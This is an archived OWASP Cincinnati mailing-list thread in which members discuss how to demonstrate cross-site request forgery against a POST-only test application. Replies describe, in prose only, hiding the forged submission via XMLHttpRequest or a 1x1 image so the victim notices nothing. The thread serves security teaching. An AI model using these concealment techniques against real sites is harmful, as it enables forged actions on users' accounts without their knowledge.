[Owasp-cincinnati] Demonstrate CSRF with Web app only accept POST

Marco M. Morana marco.m.morana at gmail.com
Fri Jun 20 18:29:10 EDT 2008


Correct, since the request is forget in a 1x1 pixel image tag that causes no
visible error to the user.

Marco

-----Original Message-----
From: owasp-cincinnati-bounces at lists.owasp.org
[mailto:owasp-cincinnati-bounces at lists.owasp.org] On Behalf Of Joe Combs
Sent: Friday, June 20, 2008 5:45 PM
To: Zhou, Yan; owasp-cincinnati at lists.owasp.org
Subject: Re: [Owasp-cincinnati] Demonstrate CSRF with Web app only accept
POST

If you borrow a technique from the ajax crowd and do your submit in 
javascript via XMLHttpRequest you should get the desired behavior in 
your demo. The app could then silently swallow the result returned by 
the form submission.

Joe

Zhou, Yan wrote:
>
> Hi there,
>
> I want to demonstrate CSRF with a vulnerable Web application.
>
> Here is the idea, the user first login to the vulnerable web app (it 
> only accepts POST), and then the user will click on an "attack" web 
> page, which does an automatic form submit. That completes CSRF 
> exercise. However, once the form is submitted, the user will notice 
> that because the screen will have changed.
>
> How would you hide this so that user cannot see the result of form 
> submit. I have tried page redirect but is not working as I expected. 
> The problem seems to be: once the form is submitted, I cannot rely on 
> any code after it being executed (simply because the server will now 
> respond with a different page) ..
>
> Thanks,
>
> Yan
>
>
>
>
> *Confidentiality Notice:* The information contained in this electronic 
> transmission is confidential and may be legally privileged. It is 
> intended only for the addressee(s) named above. If you are not an 
> intended recipient, be aware that any disclosure, copying, 
> distribution or use of the information contained in this transmission 
> is prohibited and may be unlawful. If you have received this 
> transmission in error, please notify us by telephone (513) 229-5500 or 
> by email (postmaster at MedPlus.com). After replying, please erase it 
> from your computer system.
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Owasp-cincinnati mailing list
> Owasp-cincinnati at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-cincinnati
>   
_______________________________________________
Owasp-cincinnati mailing list
Owasp-cincinnati at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-cincinnati



More information about the Owasp-cincinnati mailing list